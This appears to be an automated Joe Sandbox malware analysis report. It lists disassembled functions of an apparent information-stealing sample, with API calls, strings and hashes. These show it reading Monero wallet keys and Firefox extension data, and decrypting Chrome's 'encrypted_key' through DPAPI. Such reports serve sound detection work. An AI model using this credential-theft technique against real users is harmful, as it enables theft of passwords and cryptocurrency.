Part of subcall function 0096A1F0: lstrcpy.KERNEL32(00970DC6,00000000), ref: 0096A255

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

SetEnvironmentVariableA.KERNEL32(01208890,00000000,00000000,?,00971290,?,?,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00970AE6), ref: 0095A082

Strings

C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0095A002, 0095A016, 0095A02C

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
API String ID: 2929475105-4027016359
Opcode ID: b938fb08c79589d09d6408ef5d8dd1bc51732cea82856354526f698bd491d124
Instruction ID: f69635e27cefa34a9842c5fa3796933ddcf4926ef6fc501f6e943c1260a16c15
Opcode Fuzzy Hash: b938fb08c79589d09d6408ef5d8dd1bc51732cea82856354526f698bd491d124
Instruction Fuzzy Hash: D7410072908105EFC714DFB4EC56BAE7BB9AB48301F14412DF90DA32A1DF716988CB52

Function 0095A1B0 Relevance: 6.4, APIs: 4, Instructions: 360filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

Part of subcall function 00968600: GetSystemTime.KERNEL32(00970E02,01209C18,0097059E,?,?,009513F9,?,0000001A,00970E02,00000000,?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 00968626

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0095A231
lstrlen.KERNEL32(00000000), ref: 0095A5EA

Part of subcall function 00959E60: LocalAlloc.KERNEL32(00000040,?), ref: 00959EFE

lstrlen.KERNEL32(00000000,00000000), ref: 0095A32D
DeleteFileA.KERNEL32(00000000), ref: 0095A671

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTime
String ID:
API String ID: 3104408854-0
Opcode ID: f59cb30607cfec32161191cf82a535b288085fe350f148d0b6e1a317843bd092
Instruction ID: cc0f146a0678d5cba81fdce1746ac10ab565fe54a1fc65c61bbf48a5f5a98845
Opcode Fuzzy Hash: f59cb30607cfec32161191cf82a535b288085fe350f148d0b6e1a317843bd092
Instruction Fuzzy Hash: 5BD1BC728541089ACB19FBA4DCA6FEE7338AF95300F508159F517720A2EF716A4CCF66

Function 0095D5C0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

Part of subcall function 00968600: GetSystemTime.KERNEL32(00970E02,01209C18,0097059E,?,?,009513F9,?,0000001A,00970E02,00000000,?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 00968626

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0095D641
lstrlen.KERNEL32(00000000), ref: 0095D7DF
lstrlen.KERNEL32(00000000), ref: 0095D7F3
DeleteFileA.KERNEL32(00000000), ref: 0095D872

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: ae86cb4a7f86acb2a10f2298f1063ca2cebd47dc6a857c89dd94e030114a4e12
Instruction ID: 34fcf9eccd85f06b1a7703ec6abab930a3e3f8e254fe648bdbe252aa573d2d01
Opcode Fuzzy Hash: ae86cb4a7f86acb2a10f2298f1063ca2cebd47dc6a857c89dd94e030114a4e12
Instruction Fuzzy Hash: CF81B8729141089BCB04FBA4DCA6FEE7738AF95304F408529F517B61A1EF746A48CF62

Function 0095F2E0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

Part of subcall function 00959A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00959A3C
Part of subcall function 00959A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A61
Part of subcall function 00959A10: LocalAlloc.KERNEL32(00000040,?), ref: 00959A81
Part of subcall function 00959A10: ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959AAA
Part of subcall function 00959A10: LocalFree.KERNEL32(0095148F), ref: 00959AE0
Part of subcall function 00959A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00959AEA

Part of subcall function 009688D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009688F2

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
Part of subcall function 0096A2F0: lstrcat.KERNEL32(00000000), ref: 0096A352

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00971524,00970D7A), ref: 0095F38C
lstrlen.KERNEL32(00000000), ref: 0095F3AB

Strings

^userContextId=4294967295, xrefs: 0095F3DC
moz-extension+++, xrefs: 0095F3ED

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$ChangeCloseCreateFindFreeNotificationReadSize
String ID: ^userContextId=4294967295$moz-extension+++
API String ID: 2768692033-3310892237
Opcode ID: 94a5843ff485cb13ac087ae0b13316754ab487dd4204913e8b9dc9803362bf16
Instruction ID: e44faa9cfd7bdf622abdfe9f95a991f432d01f5a02d16b14fdb2fa37f057fb61
Opcode Fuzzy Hash: 94a5843ff485cb13ac087ae0b13316754ab487dd4204913e8b9dc9803362bf16
Instruction Fuzzy Hash: B751CE729142089ACB04FBB4DC96EEE7779AFD5304F418528F81677191EE746A0CCF62

Function 00959D30 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Part of subcall function 00959A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00959A3C
Part of subcall function 00959A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A61
Part of subcall function 00959A10: LocalAlloc.KERNEL32(00000040,?), ref: 00959A81
Part of subcall function 00959A10: ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959AAA
Part of subcall function 00959A10: LocalFree.KERNEL32(0095148F), ref: 00959AE0
Part of subcall function 00959A10: FindCloseChangeNotification.KERNEL32(000000FF), ref: 00959AEA

Part of subcall function 009688D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009688F2

StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00959D89

Part of subcall function 00959B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00954F3E,00000000,00000000), ref: 00959B3F
Part of subcall function 00959B10: LocalAlloc.KERNEL32(00000040,?,?,?,00954F3E,00000000,?), ref: 00959B51
Part of subcall function 00959B10: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00954F3E,00000000,00000000), ref: 00959B7A
Part of subcall function 00959B10: LocalFree.KERNEL32(?,?,?,?,00954F3E,00000000,?), ref: 00959B8F

Part of subcall function 00959BB0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00959BD4
Part of subcall function 00959BB0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00959BF3
Part of subcall function 00959BB0: LocalFree.KERNEL32(?), ref: 00959C23

Strings

, xrefs: 00959E11
"encrypted_key":", xrefs: 00959D80
DPAPI, xrefs: 00959DD9

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Local$Alloc$CryptFileFree$BinaryString$ChangeCloseCreateDataFindNotificationReadSizeUnprotectlstrcpy
String ID: $"encrypted_key":"$DPAPI
API String ID: 549879638-738592651
Opcode ID: 65cf81539483a0aaf0e9636a1847a99f16179aa4d0ce72db95840e5fdbf0ff32
Instruction ID: a6f9f8eff1860ea0b8144ce9ff245d67be57e18c686a210875417d2d6582267b
Opcode Fuzzy Hash: 65cf81539483a0aaf0e9636a1847a99f16179aa4d0ce72db95840e5fdbf0ff32
Instruction Fuzzy Hash: BC3144B6D10109DBDF04DFE5DC46AEFB7B8AF88305F444518E915B7241EB30AA08CBA1

Function 00968120 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0096816A
Process32First.KERNEL32(?,00000128), ref: 0096817E
Process32Next.KERNEL32(?,00000128), ref: 00968193

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

FindCloseChangeNotification.KERNEL32(?), ref: 00968201

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcpy$Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 3491751439-0
Opcode ID: 3d5beb4d49efa9904fd5b8c5d3f3d08e84d0adb0c0e5591dbd141754aa6c3309
Instruction ID: 1fbfaef468c47e26211bc6375e81afd08742f0ea8dee373ba0dbe835bbdece70
Opcode Fuzzy Hash: 3d5beb4d49efa9904fd5b8c5d3f3d08e84d0adb0c0e5591dbd141754aa6c3309
Instruction Fuzzy Hash: 22311771905218ABCB24EB55DC56FEEB778EF89700F104299E50EB61A0DF706E48CFA1

Function 00966593 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012089D0,?,009710DC,?,00000000,?,009710E0,?,00000000,00970ADA), ref: 0096656A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00966588
CloseHandle.KERNEL32(00000000), ref: 00966599
Sleep.KERNEL32(00001770), ref: 009665A4
CloseHandle.KERNEL32(?,00000000,?,012089D0,?,009710DC,?,00000000,?,009710E0,?,00000000,00970ADA), ref: 009665BA
ExitProcess.KERNEL32 ref: 009665C2

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
